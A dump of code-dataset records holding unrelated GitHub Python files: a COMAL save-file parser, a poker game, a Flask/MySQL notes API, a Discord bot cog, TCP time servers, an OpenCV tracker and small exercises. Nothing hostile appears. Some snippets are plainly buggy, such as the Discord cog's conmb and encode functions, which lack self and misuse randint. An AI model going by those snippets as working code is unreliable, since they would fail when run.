'''\n if get_token(stream[0]) == \"FILE\":\n yield from self.expect_file(stream)\n yield from self.expect_expr(stream)\n while self.peek(stream, \",\"):\n yield \",\"\n yield from self.expect_expr(stream)\n\n def render_statement(self, stream):\n ''' render a (sub-)statement '''\n token = get_token(stream[0])\n if not token:\n return\n try:\n rfunc = getattr(self, \"render_\" + token.lower())\n except AttributeError:\n yield \"[NO RENDER FUNC %s %s]\" % (token, bytes(stream).hex())\n print(\"NO RENDER\", token, self.up.this, bytes(stream).hex())\n return\n yield from self.expect(stream, token)\n try:\n yield from rfunc(stream)\n except:\n yield \"[FAIL RENDER FUNC %s %s]\" % (token, bytes(stream).hex())\n return\n\n def render(self):\n ''' render as statement '''\n stream = list(self.this[3:])\n tokens = list(self.render_statement(stream))\n txt = \" \".join(tokens)\n if not stream or stream[0] == 0xe2:\n return txt\n print(self.up.this, self.lineno, \"DRIBBLES\", txt + \"[\" + bytes(stream).hex() + \"]\")\n return txt + \"[\" + bytes(stream).hex() + \"]\"\n\n def html_render(self):\n ''' render as statement '''\n try:\n r = self.render()\n if r:\n yield r\n return\n except UnicodeDecodeError as error:\n print(self.up.this, error, self.this.hex())\n yield \"[\" + self.this[:3].hex() + \" \" + self.this[3:].hex() + \"]\"\n\n\nclass ComalUPAS():\n ''' program segment '''\n def __init__(self, up, this):\n self.up = up\n self.this = this\n self.statements = []\n offset = 66 * 2\n while offset < len(self.this):\n i = struct.unpack(\">HB\", self.this[offset:offset + 3])\n self.statements.append(\n ComalStatement(\n self.up,\n i[0],\n self.this[offset:offset + i[1] * 2]\n )\n )\n offset += i[1] * 2\n if this[4] == 0xe9:\n self.filename = string(list(this[4:65*2]))\n else:\n self.filename = None\n\n def html_detailed(self, fo, _this):\n ''' Render program segment as listing '''\n fo.write(\"
<H3>UPAS Segment</H3>\\n\")\n        fo.write(\"<pre>
    \\n\")\n\n        if self.filename:\n            fo.write(\"SAVE filename: \" + self.filename + \"\\n\\n\")\n        pfx = 0\n        for i in self.statements:\n            x = list(i.html_render())\n            if i.outdent:\n                pfx -= 1\n            for j in x:\n                fo.write(\" %04d \" % i.lineno + \"  \" * pfx + j + \"\\n\")\n            if i.indent:\n                pfx += 1\n\n        fo.write(\"
    \\n\")\n\nclass ComalVariable():\n ''' A COMAL variable '''\n def __init__(self, up, this):\n self.up = up\n self.this = this\n self.name = \"\"\n self.bits = 0\n for i in range(8):\n x = this[i]\n if i == 0 and x > 127:\n self.bits |= 1 << i\n x -= 128\n elif i == 1:\n if x & 1:\n self.bits |= 1 << i\n x >>= 1\n if not x:\n break\n if 32 < x < 127:\n self.name += \"%c\" % x\n else:\n self.name += \"{%d}\" % x\n\n if self.bits & 2:\n self.name += \"$\"\n\n self.ptr = struct.unpack(\">H\", this[8:10])[0]\n\n # print(\"VAR\", self.name, self.bits, self.ptr, this.hex())\n\n def html_render(self):\n ''' Render '''\n return \"0x%04x 0x%02x %s\" % (self.ptr, self.bits, self.name)\n\nclass ComalUDAS():\n ''' Data segment '''\n def __init__(self, up, this):\n self.up = up\n self.this = this\n\n self.variables = []\n for offset in range(104*2, self.up.u_dvs * 2, 10):\n self.variables.append(ComalVariable(self.up, self.this[offset:offset + 10]))\n\n def html_detailed(self, fo, _this):\n ''' dump variables '''\n fo.write(\"
<H3>UDAS Segment</H3>\\n\")\n        fo.write(\"<pre>
    \\n\")\n        words = list(struct.unpack(\">104H\", self.this[:104*2]))\n\n        for i in range(29):\n            fo.write(\"    FN%c definition = 0x%04x\\n\" % (0x41 + i, words.pop(0)))\n\n        def stack7(what):\n            fo.write(\"    %s stack pointer = 0x%04x\\n\" % (what, words.pop(0)))\n            for i in range(7):\n                fo.write(\"      stack[%d] = 0x%04x\\n\" % (i, words.pop(0)))\n\n        stack7(\"GOSUB-RETURN\")\n\n        fo.write(\"    FOR-NEXT stack pointer = 0x%04x\\n\" % words.pop(0))\n        for i in range(7):\n            fo.write(\"      Var# = 0x%04x\\n\" % words.pop(0))\n            fo.write(\"      Loop Top = 0x%04x\\n\" % words.pop(0))\n            for j in (\"To\", \"Step\"):\n                x = words.pop(0)\n                y = words.pop(0)\n                z = number([x >> 8, x & 0xff, y >> 8, y & 0xff])\n                fo.write(\"      %s Val = %s\" % (j, z))\n                fo.write(\"   (0x%04x%04x)\\n\" % (x, y))\n\n        stack7(\"REPEAT-UNTIL\")\n        stack7(\"WHILE-ENDWHILE\")\n        stack7(\"IF-ELSE\")\n        assert not words\n        fo.write(\"Variables:\\n\")\n        for n, i in enumerate(self.variables):\n            fo.write(\"    0x%02x %s\\n\" % (n + 0x80, i.html_render()))\n        # XXX values\n        fo.write(\"
    \\n\")\n\n\nclass ComalSaveFile():\n ''' A RC7000 COMAL SAVE file '''\n def __init__(self, this):\n if len(this) < 64 or this[:2] not in (b'SV', b'N2', b'RO'):\n return\n if this.has_type(\"COMAL_SAVE\"):\n return\n\n self.head = struct.unpack(\">BBHH\", this[0:6])\n\n offset = 6 + 2 * sum(self.head[2:])\n self.uvars = (\n (\"dvs\", \"Start på savede variabel indhold (word adr)\"),\n (\"nds\", \"Address på næste prog.sætning (word adr)\"),\n (\"cps\", \"Address på curr prog.sætning (word adr)\"),\n (\"tll\", \"Page størrelse\"),\n (\"tts\", \"TAP størrelse\"),\n (\"ran\", \"Random tal\"),\n (\"cdl\", \"Current DATA sætning ptr\"),\n (\"cdb\", \"Current DATA byte ptr\"),\n (\"esa\", \"ON ESE (word adr)\"),\n (\"era\", \"ON ERR (word adr)\"),\n (\"cas\", \"CASE dybde\"),\n (\"las\", \"last (-1)\"),\n )\n\n for b, _c in self.uvars:\n if offset + 2 > len(this):\n return\n i = struct.unpack(\">H\", this[offset:offset + 2])\n setattr(self, \"u_\" + b, i[0])\n offset += 2\n\n if self.u_las != 0xffff:\n return\n\n this = this.create(start=0, stop=offset)\n self.this = this\n this.add_type(\"COMAL_SAVE\")\n\n offset = 6\n length = self.head[2] * 2\n self.upas = ComalUPAS(self, this.create(start=offset, stop=offset+length))\n\n offset += length\n length = self.head[3] * 2\n self.udas = ComalUDAS(self, this.create(start=offset, stop=offset+length))\n\n this.add_interpretation(self, self.upas.html_detailed)\n this.add_interpretation(self, self.udas.html_detailed)\n this.add_interpretation(self, self.html_detailed)\n\n def html_detailed(self, fo, _this):\n ''' The status words '''\n fo.write(\"
<H3>Wrapper</H3>\\n\")\n        fo.write(\"<pre>
    \\n\")\n\n        words = struct.unpack(\">BBHH\", self.this[0:6])\n        fo.write(\".magic = 0x%02x%02x\\n\" % (words[0], words[1]))\n        fo.write(\".u_pas = 0x%04x  // Length of UPAS in words\\n\" % words[2])\n        fo.write(\".u_das = 0x%04x  // Length of UDAS in words\\n\" % words[3])\n        for b, c in self.uvars:\n            i = getattr(self, \"u_\" + b)\n            fo.write(\".u_%s = 0x%04x  // %s\\n\" % (b, i, c))\n\n        fo.write(\"
    \\n\")\n","repo_name":"Datamuseum-DK/AutoArchaeologist","sub_path":"autoarchaeologist/regnecentralen/rc7000_comal.py","file_name":"rc7000_comal.py","file_ext":"py","file_size_in_byte":29231,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"10680315230","text":"import numpy as np\nfrom player import *\nfrom hand_strength import get_score, hand_strength, vencedor_linha\nfrom bot import place_cards\nfrom royalties import pontos2,pontos3\n\nclass Game:\n def __init__(self, n_players, n_AIs, thread_scale,num_jogadores = 1):\n \"\"\"\n Class associada ao jogo de Poker, onde temos um baralho de 52 cartas,\n \\'2,3,4,5,6,7,8,9,10,J,Q,K,A\\' com 4 nipes cada uma das cartas\n \\'S\\' - Spades\n \\'H\\' - Hearts\n \\'C\\' - Clubs\n \\'D\\' - Diamons\n \"\"\"\n self.thread_scale = thread_scale\n while n_players + n_AIs > 3:\n print(\"Maximo 3 jogadores\")\n n_players = input(\"Number of human players\\n>>>\")\n n_AIs = input(\"Number of BOTS\\n>>>\")\n\n self.players_list = []\n self.AIs_list = []\n\n for i in range(n_players):\n #listab de players\n nome = input(f\"Player {i+1} what is your name?\\n>>>\")\n self.players_list += [Player(nome)] \n\n for i in range(n_AIs):\n self.AIs_list += [Player(f\"AI {i+1}\")]\n\n self.baralho = self.create_deck()\n self.run_game_until()\n\n def create_deck(self):\n h_cards = np.array([\"T\", \"Q\", \"J\", \"K\", \"A\"])\n l_cards = np.linspace(2, 9, 8, dtype = int)\n num_cards = np.concatenate((h_cards, l_cards))\n nipes = [\"S\", \"H\", \"C\", \"D\"]\n deck = []\n \n for nipe in nipes:\n for num in num_cards:\n deck += [num + nipe]\n \n return np.array(deck)\n \n def draw_card(self, player):\n card = np.random.choice(self.baralho)\n self.baralho = np.delete(self.baralho, np.argwhere(self.baralho == card))\n \n player.give_card(card)\n\n return card\n \n def game_loop(self):\n \"\"\"\n Loop associado a um jogo de POFCP\n \"\"\"\n\n # PLayers Turn\n for player in self.players_list:\n\n # Tirar as primeiras 5 cartas \n for _ in range(5):\n card = self.draw_card(player)\n \n # Primeira Mão Player\n print(6*\"#\" + f\" {player.name} \" + 6*\"#\")\n print(f\"Saiu lhe a seguinte m`ão {player.hand}\")\n\n for i in range(5):\n pos = input(f\"Onde quer colocar {player.hand[i]}?\\n>>> \")\n player.add_2_table(pos)\n \n print(player.field)\n print(2*\"\\n\")\n\n # BOTS Turn\n for bot in self.AIs_list:\n\n # Tirar as primeiras 5 cartas\n for _ in range(5):\n card = self.draw_card(bot)\n\n print(6*\"#\" + f\" {bot.name} \" + 6*\"#\")\n print(f\"Saiu lhe a seguinte mão {bot.hand}\")\n \n place_AI = place_cards(self, bot, bot.hand, self.thread_scale)[0]\n print(place_AI)\n for i in range(5):\n if place_AI[i] == 0:\n bot.add_2_table(\"top\")\n elif place_AI[i] == 1:\n bot.add_2_table(\"mid\")\n else:\n bot.add_2_table(\"bot\")\n \n print(bot.field)\n print(2*\"\\n\")\n\n num_cards = sum([len(player.hand) for player in self.players_list + self.AIs_list])/ (len(self.players_list) + len(self.AIs_list))\n\n while num_cards != 13:\n\n # Player 3cards game cicle\n for player in self.players_list:\n print(6*\"#\" + f\" {player.name} \" + 6*\"#\") # Vez do jogador 1 jogar\n cards = np.array([])\n \n for _ in range(3):\n card = self.draw_card(player)\n cards = np.append(cards, card)\n \n print(player.field)\n card_off = input(f\"{player.name} saiu lhe as seguintes {cards} qual quer descartar?\\n>>> \")\n \n while card_off not in cards:\n card_off = input(f\"Carta inválida!! 
{cards} qual quer descartar?\\n>>> \")\n \n player.add_lixo(card_off)\n cards = np.delete(cards, np.argwhere(cards == card_off))\n \n for card in cards: \n pos = input(f\"{player.name} saiu lhe {card} onde quer por a carta?\\n>>> \")\n player.add_2_table(pos)\n \n print(2*\"\\n\")\n\n # Player 3cards game cicle\n for bot in self.AIs_list:\n\n print(6*\"#\" + f\" {bot.name} \" + 6*\"#\")\n cards = np.array([])\n \n for _ in range(3):\n card = self.draw_card(bot)\n cards = np.append(cards, card)\n \n AI_move = place_cards(self, bot, cards, self.thread_scale)\n place_AI = AI_move[0]\n card_off = AI_move[1]\n \n bot.add_lixo(card_off)\n cards = np.delete(cards, np.argwhere(cards == card_off))\n \n for i in range(2):\n j = i\n if len(place_AI) == 1:\n j = 0\n if place_AI[j] == 0:\n bot.add_2_table(\"top\")\n elif place_AI[j] == 1:\n bot.add_2_table(\"mid\")\n else:\n bot.add_2_table(\"bot\")\n\n print(bot.field)\n print(2*\"\\n\")\n\n num_cards = sum([len(player.hand) for player in self.players_list + self.AIs_list])/ (len(self.players_list) + len(self.AIs_list))\n \n print(\"Vamos calcular os pontos\")\n for player in self.players_list + self.AIs_list:\n print(6*\"#\" + f\" {player.name} \" + 6*\"#\")\n print(player.field)\n\n players_wins = self.players_list + self.AIs_list\n winner = players_wins[0]\n max_poinst = -1\n no_winners_flag = False\n if len(players_wins)==2:\n pontos = pontos2(players_wins[0],players_wins[1])\n elif len(players_wins)==3: \n pontos = pontos3(players_wins[0],players_wins[1],players_wins[2])\n \n for point, player in zip(pontos, players_wins):\n player.update_points(point)\n print(f\"{player.name}: {player.points}\")\n\n def run_game_until(self, points_th = 5):\n max_point = 0\n \n while max_point < points_th:\n self.game_loop()\n max_point = 0\n players_list = self.players_list + self.AIs_list\n for i in range(len(self.players_list) + len(self.AIs_list)):\n max_point = max(max_point, players_list[i].points)\n self.baralho = self.create_deck()\n players = self.players_list + self.AIs_list\n\n for player in players:\n player.reset()\ndef main():\n jogo = Game(0,3,0)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mArcio-Lmano/OFCP","sub_path":"PPL_proj.py","file_name":"PPL_proj.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37405457224","text":"from flask import Flask, jsonify\nfrom flask_restful import Resource, Api, reqparse\nimport pymysql\nimport pymysql.cursors\nimport json\n\n\nconnection = pymysql.connect(host='localhost',\n user='root',\n password='',\n db='notas',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n\napp = Flask(__name__)\napi = Api(app)\nparser = reqparse.RequestParser()\n\n@app.route(\"/notes.php\")\ndef lista():\n with connection.cursor() as cursor:\n # Read a single record\n sql = \"SELECT * FROM `nota`\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return jsonify(result)\n\n@app.route(\"/save.php\", methods=['POST'])\ndef save():\n x={}\n parser.add_argument('title', type=str)\n parser.add_argument('note', type=str)\n parser.add_argument('color', type=int)\n args = parser.parse_args()\n with connection.cursor() as cursor: \n sql = \"INSERT INTO `nota` (`title`, `note`, `color`) VALUES (%s, %s, %s)\"\n result = cursor.execute(sql, (args['title'], args['note'], args['color']))\n \n if result == 1:\n x = {\n \"success\": True,\n \"message\": 'Successfully', \n }\n else :\n x = {\n \"success\": False,\n 
\"message\": 'Failure', \n }\n\n\n connection.commit()\n return(jsonify(x))\n\n@app.route(\"/update.php\", methods=['POST'])\ndef update():\n x={}\n parser.add_argument('id', type=int)\n parser.add_argument('title', type=str)\n parser.add_argument('note', type=str)\n parser.add_argument('color', type=int)\n args = parser.parse_args()\n with connection.cursor() as cursor: \n sql = \"UPDATE `nota` SET title=%s, note=%s, color=%s WHERE `id`= %s \"\n result = cursor.execute(sql, (args['title'], args['note'], args['color'],args['id']))\n \n if result == 1:\n x = {\n \"success\": True,\n \"message\": 'Successfully', \n }\n else :\n x = {\n \"success\": False,\n \"message\": 'Failure', \n }\n\n\n connection.commit()\n return(jsonify(x))\n\n@app.route(\"/delete.php\", methods=['POST'])\ndef delete():\n x={}\n parser.add_argument('id', type=int) \n args = parser.parse_args()\n with connection.cursor() as cursor: \n sql = \"DELETE FROM nota WHERE id='%s'\"\n result = cursor.execute(sql, (args['id']))\n \n if result == 1:\n x = {\n \"success\": True,\n \"message\": 'Successfully', \n }\n else :\n x = {\n \"success\": False,\n \"message\": 'Failure', \n }\n\n\n connection.commit()\n return(jsonify(x))\n\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000)","repo_name":"jorgepaz96/api_rest_python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43982036411","text":"menu = \"\"\"a) The average score of class\nb) The Highest score and lowest score of class\nc) Count of students who were absent for the test\nd) Display the no, of students in the specific range\ne) Enter e to exit.\n\"\"\"\nprint(menu)\nmarks = []\nfor i in range(10):\n\tstudent = {'Name': str(i), 'Score': 80 + i}\n\tmarks.append(student)\navg = 0\narr = []\nabsent = 0\nfor i in marks:\n\tavg += i['Score']\n\tarr.append(i['Score'])\n\tif i['Score'] < 0:\n\t\tabsent += 1\navg = avg / len(marks)\nmax_marks = max(arr)\nmin_marks = min(arr)\nwhile True:\n\tchoice = input(\"Enter your choice: \").lower()\n\tif choice == 'a':\n\t\tprint(\"Avg of class is \", avg)\n\telif choice == 'b':\n\t\tprint('Max:', max_marks, 'Min:', min_marks)\n\telif choice == 'c':\n\t\tprint('Absent', absent)\n\telif choice == 'd':\n\t\tx, y = map(int, input('Enter the range: ').split())\n\t\tcnt = 0\n\t\tfor i in marks:\n\t\t\tif x <= i['Score'] < y:\n\t\t\t\tcnt += 1\n\t\tprint(\"No of students in the given range is \", cnt)\n\telif choice == 'e':\n\t\texit(1)\n\telse:\n\t\tprint('Enter a valid choice.')\n","repo_name":"saikiranreddyappidi/pythonModuleBank","sub_path":"_6_class_marks.py","file_name":"_6_class_marks.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4669071754","text":"import numpy as np\n\nlines = open(\"input\", \"r\").readlines()\narray = [list(line.strip()) for line in lines]\nres_array = np.zeros(np.array(array).shape).astype(int)\n\nnetwork = {}\n\nfor i in range(len(array)):\n for j in range(len(array[i])):\n source = (i, j)\n targets = []\n if i - 1 >= 0:\n targets.append((i - 1, j))\n if i + 1 < len(array):\n targets.append((i + 1, j))\n if j - 1 >= 0:\n targets.append((i, j - 1))\n if j + 1 < len(array[i]):\n targets.append((i, j + 1))\n\n network[source] = [(targ, int(array[targ[0]][targ[1]])) for targ in targets]\n\n\nqueue = [((0, 0), 0, (0, 0))]\nshape = 
res_array.shape\nvisited = set()\npath = {}\n\nwhile queue:\n coord, current_val, from_coord = queue.pop(0)\n if coord in visited:\n continue\n\n path[from_coord] = coord\n\n visited.add(coord)\n res_array[coord] = current_val\n if coord == (shape[0] - 1, shape[1] - 1):\n break\n\n targets = network[coord]\n new_targets = [\n (t[0], t[1] + current_val, coord) for t in targets if t[0] not in visited\n ]\n queue.extend(new_targets)\n queue.sort(key=lambda x: x[1])\n array[coord[0]][coord[1]]\n\n\nprint(res_array)\nprint(coord, shape, current_val, len(visited))\n","repo_name":"ProgHaj/AdventOfCode2021","sub_path":"15/p1t2.py","file_name":"p1t2.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21850750117","text":"import sys\nimport heapq\ninput = sys.stdin.readline\n\nn = int(input())\nm = int(input())\ngraph = [[] for _ in range(n+1)]\nfor _ in range(m):\n a, b, c = map(int, input().split())\n graph[a].append((b, c))\ndistance = [sys.maxsize] * (n+1)\nstart, end = map(int, input().split())\n\nq = []\nheapq.heappush(q, (0, start))\ndistance[start] = 0\nwhile q:\n dist, node = heapq.heappop(q)\n\n if distance[node] < dist:\n continue\n\n for neigh, cost in graph[node]:\n if distance[neigh] > dist + cost:\n distance[neigh] = dist + cost\n heapq.heappush(q, (dist + cost, neigh))\n\nprint(distance[end])","repo_name":"bhyun/daily-algorithm","sub_path":"2022/2022.02/BOJ1916_최소비용 구하기.py","file_name":"BOJ1916_최소비용 구하기.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22017863604","text":"from builtins import range, dict\n\n__author__ = 'steve'\n\nimport unittest\nimport GibbsSampler as gs\nimport RandomisedMotifSearch as rms\n\n\nclass MyTestCase(unittest.TestCase):\n def test_random(self):\n pdf = [0.1, 0.8, 0.1]\n\n results = dict()\n\n for _ in range(0, 100000):\n i = gs.biased_random_selector(pdf)\n if i in results:\n results[i] += 1\n else:\n results[i] = 1\n\n print(results)\n\n def test_random_most_probable_kmer_for_profile(self):\n\n p = rms.create_profile([\"CAAAA\", \"AGAAC\", \"ATAAA\", \"GAACG\"])\n s = \"ATATA\"\n k = 3\n\n for i in range(0, 100):\n result = gs.random_most_probable_kmer_for_profile(p, s, k)\n print (result)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"stevehaigh/Bioinformatics","sub_path":"Chapter 3/TestGibbsSampler.py","file_name":"TestGibbsSampler.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8847785007","text":"import discord\nfrom discord.ext import commands\nimport random\n\nclass Extra():\n \"\"\"Extra bot commands\"\"\"\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(pass_context=True)\n async def randmsg(self, ctx):\n msgbits1 = [\n \"a noob.\",\"lolin' my life.\",\n \"bored of not using me bro.\",\"a very clever bot.\",\n \"looking for someone to type `:help`.\"]\n msgbits2 = [\n \"some oil for my gears.\",\n \"u to type a command!.\",\"u to help me code.\",\n \"someone brave enough to join here: https://discord.gg/gFuac2r\",\"sb to fix my gears!\"]\n msgbits3 = [\n \"u haven't just got out of the mistletoe\",\"I could love one day\"]\n msgs = [\n \"Im\",\n \"I want\",\n \"I hope\",\n \"I found a new friend!\",\n \"Looks like there is an anxious user!\",\n \"A bird in the sky!\",\n \"Who turned off the lights 
:(\",\n \"Hate it when no onew uses me\",\n \"Type :help to see all my commands\",\n \"Did u know that the server owner could load new plugins\",\n \"Like being a bot\",\n \"Isn't it amazing that\",\n \"Like my commands?\"]\n randMsg = random.choice(msgs)\n if randMsg == \"Im\":\n randBits = random.choice(msgbits1)\n randMsg = randMsg + \" \" + randBits\n await self.bot.say(randMsg)\n elif randMsg == \"I want\":\n randBits = random.choice(msgbits2)\n randMsg = randMsg + \" \" + randBits\n await self.bot.say(randMsg)\n elif randMsg == \"I hope\":\n randBits = random.choice(msgbits3)\n randMsg = randMsg + \" \" + randBits\n await self.bot.say(randMsg)\n else:\n await self.bot.say(randMsg)\n\n @commands.command(pass_context=True)\n async def conmb(ctx):\n \"\"\"Returns all members connected to a voice channel\"\"\" \n x = ctx.message.server.members\n conmembs = []\n for member in x:\n if member.voice_channel != None:\n conmembs.append(member.name)\n \n if conmembs == []:\n await client.say(\"No members are connected to a voice channel\")\n else:\n await client.say(\"{}\".format(\" \".join(conmembs)))\n @commands.command(pass_context=True)\n async def encode(ctx, *, msg):\n encoded = []\n msg = msg.lower()\n for letter in msg:\n randnum = randint(0, len(msg)-1)\n if letter == \"i\":\n letter = \"1\"\n encoded.append(letter)\n elif letter == \"a\":\n letter = \"@\"\n encoded.append(letter)\n elif letter == \"e\":\n letter = \"3\"\n encoded.append(letter)\n elif letter == \"o\":\n letter = \"0\"\n encoded.append(letter)\n else:\n if msg[randint] == letter:\n letter = letter.upper()\n encoded.append(letter)\n await client.say(\"Encoded message:{}\".format(\" \".join(encoded)))\n \n\ndef setup(bot):\n bot.add_cog(Extra(bot))\n","repo_name":"stavzog/CraftOLeagueBot","sub_path":"optional.py","file_name":"optional.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29932241790","text":"import socket, time, threading\n\ndef server(handler, host, port):\n s = socket.socket()\n s.bind((host, port))\n s.listen(5)\n print('Server up, running, and waiting for call')\n try:\n while True:\n c, a = s.accept()\n threading.Thread(target=handler, args=(c, a)).start()\n finally:\n s.close()\n\ndef time_handler(c, a):\n print(\"Received connection from\", a)\n c.sendall(b\"Hello %s\\r\\n\" % a[0].encode())\n c.sendall(b\"The time is %s\\r\\n\" % time.ctime().encode())\n c.close()\n\ndef slow_time_handler(c, a):\n print(\"Received connection from\", a)\n c.sendall(b\"Hello %s\\r\\n\" % a[0].encode())\n c.sendall(b\"The time is %s\\r\\n\" % time.ctime().encode())\n for i in range(10):\n c.sendall(b\"The count is %d\\r\\n\" % i)\n time.sleep(1)\n c.close()\n\nif __name__ == '__main__':\n\n server(slow_time_handler, '', 9604)\n","repo_name":"vivekdua-tech/pyclass","sub_path":"notes/tcpserver_threading.py","file_name":"tcpserver_threading.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11361912953","text":"#калькулятор расчета капитализации при определенной процентной ставке и кол-во лет (до 15)\r\nmoney = float(input('Введите сумму вклада: '))\r\npercent = float(input('Введите процентную ставку: '))/100+1\r\nstop_year = int(input('Введите длительность вклада в годах: '))\r\nyear = 0\r\ngod1 = [1]\r\ngod2 = [2, 3, 4]\r\ngod3 = list(range(5,16))\r\n\r\nwhile year < stop_year:\r\n money *= percent\r\n year += 
1\r\n if year in god1:\r\n god = 'год'\r\n if year in god2:\r\n god = 'года'\r\n if year in god3:\r\n god = 'лет'\r\n print(f'Через {year} {god}, сумма вклада составит {round(money, 2)} руб.')\r\n","repo_name":"michael99o/task_test","sub_path":"tasks3.6.8.py","file_name":"tasks3.6.8.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24161807055","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ndefinitions:\nDescription\n\"\"\"\n\n__author__ = 'Tommaso Terragni, PhD.'\n__date__ = '2019-05-19'\n__copyright__ = 'Copyright 2019, Tommaso Terragni, PhD.'\n\nimport os\nimport sys\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nUSER_HOME = os.path.expanduser(\"~\")\n\nsys.path.insert(0, os.path.dirname(os.path.abspath(ROOT_DIR)))\n","repo_name":"tomterragni/test_complex_datascience_project","sub_path":"definitions.py","file_name":"definitions.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36612135803","text":"import cv2\nimport numpy as np\n\n# turn on camera at port 0\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n # read image from camera\n ret, frame = cap.read()\n\n # convert to hsv\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n # find only green colors\n cutoff = cv2.inRange(hsv, (70, 90, 90), (90, 256, 256))\n # blur image\n blur = cv2.GaussianBlur(cutoff, (11, 11), 0)\n # darken, to remove small areas the blur didn't remove\n darken = cv2.add(blur, np.array([-50.0]))\n\n # find all contours\n contours, h = cv2.findContours(darken, 1, 2)\n\n max_area = -1\n max_box = None\n # loop through contours\n for c in contours:\n # rect is ((x, y), (w, h), rot)\n rect = cv2.minAreaRect(c)\n # gets the four points on the outside of the rectangle\n box = cv2.boxPoints(rect)\n # convert to int\n box = np.int0(box)\n # find area of contour\n area = cv2.contourArea(box)\n # if area is greater than max, set the max area and contour\n if area > max_area:\n max_area = area\n max_box = box\n\n # only draw the contour of the max_area has been set\n if max_area > -1:\n cv2.drawContours(frame, [max_box], 0, (0,255,0), 2)\n\n # draw image to screen\n cv2.imshow('frame', frame)\n\n # if q is pressed, quit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# close windows\ncap.release()\ncv2.destroyAllWindows()\n\n","repo_name":"macmv/opencv-testing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35090010070","text":"\"\"\"\r\nCopyright 2019 Pacific Gas and Electric Company\r\n\r\nALL RIGHTS RESERVED\r\n\"\"\"\r\nclass history:\r\n def __init__(self):\r\n self.prevset = ''\r\n\r\n def compare(self, text, kworker=False, filter=None):\r\n self.curset = set(text.splitlines())\r\n if self.prevset == '':\r\n diff = self.curset\r\n else:\r\n diff = self.curset.difference(self.prevset)\r\n self.prevset = self.curset\r\n\r\n if filter is not None:\r\n return [x for x in diff if filter in x]\r\n elif kworker == False:\r\n return [x for x in diff if \"kworker\" not in x and \"[ps]\" not in x]\r\n else:\r\n return [x for x in diff if \"[ps]\" not in x]\r\n\r\n def write_to_file(self, file_name):\r\n with open(file_name, 'w') as f:\r\n f.writelines(self.prevset)\r\n\r\n def read_from_file(self, file_name):\r\n with open(file_name, 'r') as f:\r\n 
self.prevset = set(f.read().splitlines())\r\n","repo_name":"idaholab/STOTS","sub_path":"CommandLineEngine/conf/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"23599112862","text":"async def add(self, msg):\n try:\n coins = msg.content.split(' ')[1:]\n channel_id = msg.channel.id\n \n coins_info = self.binance_client.get_exchange_info()\n\n valid_coins = {}\n for coin_info in coins_info['symbols']:\n valid_coins[coin_info['symbol']] = True\n\n for coin in coins:\n is_added = False\n coin = coin.upper()\n if valid_coins.get(coin) == True:\n if self.channel_config[channel_id]['funds'].get(coin) is None:\n self.channel_config[channel_id]['funds'][coin] = 0\n is_added = True\n \n\n if not is_added:\n if self.channel_config[channel_id]['funds'].get(coin) is not None:\n await msg.reply('>>> It\\'s already added...')\n else:\n await msg.reply(f\">>> Did not found {msg.content.split(' ')[1]}..\")\n else:\n await msg.reply('>>> '+coin+' is added to the whitelist')\n if self.add_by.get(channel_id) is not None:\n self.add_by.pop(channel_id)\n await msg.reply('>>> addby function is stopped')\n except IndexError:\n if self.debug:\n print('Invalid Command')\n await msg.reply('Invalid Command')\n","repo_name":"h3x4d1v1n3/CrypticIntel","sub_path":"CrypticIntel/bot/on_message/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14987048270","text":"import json\n\n# My repo has next format:\n# ID - number for row,\n# Date (0) - date of transaction,\t\n# Hour (1) - hour of transaction,\t\n# Place (2) - from which place you spend money or in which place you bring your earn. 
